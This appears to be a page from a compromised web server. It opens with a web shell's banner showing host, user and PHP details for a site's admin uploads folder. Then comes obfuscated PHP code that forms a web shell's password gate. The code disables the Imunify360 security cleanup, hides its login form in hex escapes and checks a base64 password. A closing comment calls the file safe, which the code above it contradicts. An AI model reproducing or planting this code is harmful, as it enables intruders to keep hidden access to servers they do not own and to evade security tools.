Server : Apache System : Linux server.xvl.jdw.mybluehostin.me 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64 User : gdcpattikondaedu ( 1053) PHP Version : 7.4.33 Disable Function : NONE Directory : /home/gdcpattikondaedu/public_html/admin/uploads/news/ |
<?php
session_start();
ini_set('imunify360.cleanup_on_restore', false);
$memek="aGFja2luZw==";
$ramdangantengbanget = "\x62" . "a" . "se" . "\x36\x34" . "_" . "encode";
function RamdanGanteng() {
echo "\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x66\x6f\x72\x6d\x20\x6d\x65\x74\x68\x6f\x64\x3d\x27\x70\x6f\x73\x74\x27\x3e\x20\xa\x9\x9\x20\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x27\x70\x61\x73\x73\x77\x6f\x72\x64\x27\x20\x6e\x61\x6d\x65\x3d\x27\x70\x61\x73\x73\x27\x20\xa\x9\x9\x20\x70\x6c\x61\x63\x65\x68\x6f\x6c\x64\x65\x72\x3d\x27\x70\x61\x73\x73\x77\x6f\x72\x64\x27\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x6f\x72\x6d\x2d\x63\x6f\x6e\x74\x72\x6f\x6c\x27\x3e\x3c\x62\x72\x20\x2f\x3e\x20\xa\x9\x9\x20\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x27\x73\x75\x62\x6d\x69\x74\x27\x20\x63\x6c\x61\x73\x73\x3d\x27\x62\x74\x6e\x20\x62\x74\x6e\x2d\x69\x6e\x66\x6f\x20\x62\x74\x6e\x2d\x62\x6c\x6f\x63\x6b\x27\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x6f\x72\x6d\x2d\x63\x6f\x6e\x74\x72\x6f\x6c\x27\xa\x9\x9\x20\x76\x61\x6c\x75\x65\x3d\x27\x6c\x6f\x67\x69\x6e\x27\x3e";
echo "<br>HaxorSec";
exit;
}
if( !isset($_SESSION[$ramdangantengbanget($_SERVER['HTTP_HOST'])] ))
if( empty($memek) ||
( isset( $_POST['pass'] ) && ($ramdangantengbanget($_POST['pass']) == $memek) ) )
$_SESSION[$ramdangantengbanget($_SERVER['HTTP_HOST'])] = true;
else
RamdanGanteng();
?>
<?php
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/